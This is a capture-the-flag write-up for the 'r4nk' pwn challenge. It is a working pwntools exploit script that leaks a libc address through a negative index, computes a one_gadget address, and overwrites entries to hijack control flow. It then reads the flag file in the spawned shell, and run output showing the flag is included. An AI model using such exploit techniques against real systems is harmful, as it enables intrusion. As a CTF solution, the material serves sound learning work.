Tags: pwn 

Rating: 4.0

```
from pwn import *

def show():
    """Answer the service's next "> " prompt with menu choice '1'.

    Uses the module-level tube ``r``. The service's reply is not consumed
    here; the caller reads it from ``r`` afterwards.
    """
    # sendlineafter() is recvuntil(delim) followed by sendline(data).
    r.sendlineafter("> ", '1')
def rank(title, rank):
    """Answer three consecutive "> " prompts: '2', then title, then rank.

    Both arguments are sent as their decimal ``str()`` form over the
    module-level tube ``r``. Nothing is validated on the client side, so
    any range checking is left entirely to the service.
    """
    for answer in ('2', str(title), str(rank)):
        # Wait for each prompt before replying so the answers stay in step
        # with the menu.
        r.sendlineafter("> ", answer)

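# Target selection: the commented line runs the same script against a local
# copy of the binary instead of the remote CTF service.
#r = process("r4nk")
r = remote("challenges.fbctf.com", 1339)

# Store a negative value through menu entry 2, then ask the service to print.
# NOTE(review): presumably the service uses this value as an index without a
# range check, which would be the root-cause defect to fix on the service
# side -- confirm against the binary.
rank(0,-263020)
show()

# Bytes 3..8 of the reply line are read as the low six bytes of a
# little-endian 64-bit value; two zero bytes pad it to the eight that u64()
# needs. The b"" literal keeps the concatenation valid on Python 3, where the
# tube returns bytes (on Python 2 it is an ordinary str, so nothing changes).
read = u64(r.recvuntil("\n")[3:9]+b"\x00\x00")

# Both offsets are hard-coded. NOTE(review): they presumably match one
# specific libc build on the target and will be wrong for any other build --
# verify before reusing this script elsewhere.
libc = read - 0x110070
one_gadget = libc + 0x10a38c
log.info("read: %#x",read)
log.info("libc: %#x",libc)
log.info("one_gadget: %#x",one_gadget)

# Two more writes through menu entry 2, at positions 0x11 and 0x12.
# NOTE(review): the values look like fixed addresses inside the binary's
# image; what they overwrite is not visible from this script.
rank(0x11,0x400980)
rank(0x12,0x602100)

# Menu choice '3' padded to eight bytes, followed by the packed address.
# Bytes literals are needed here because p64() returns bytes on Python 3.
r.recvuntil("> ")
r.sendline(b'3'+b'A'*7+p64(one_gadget))

# Queue the command that prints the flag, then hand the session to the user.
r.sendline("cat /home/r4nk/flag")
r.interactive()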
```
```
$ python rank.py
[+] Opening connection to challenges.fbctf.com on port 1339: Done
[*] read: 0x7f80bb7ed070
[*] libc: 0x7f80bb6dd000
[*] one_gadget: 0x7f80bb7e738c
[*] Switching to interactive mode
g00dBy3
flag{wH0_n33ds_pop_rdx_4NYw4y}
```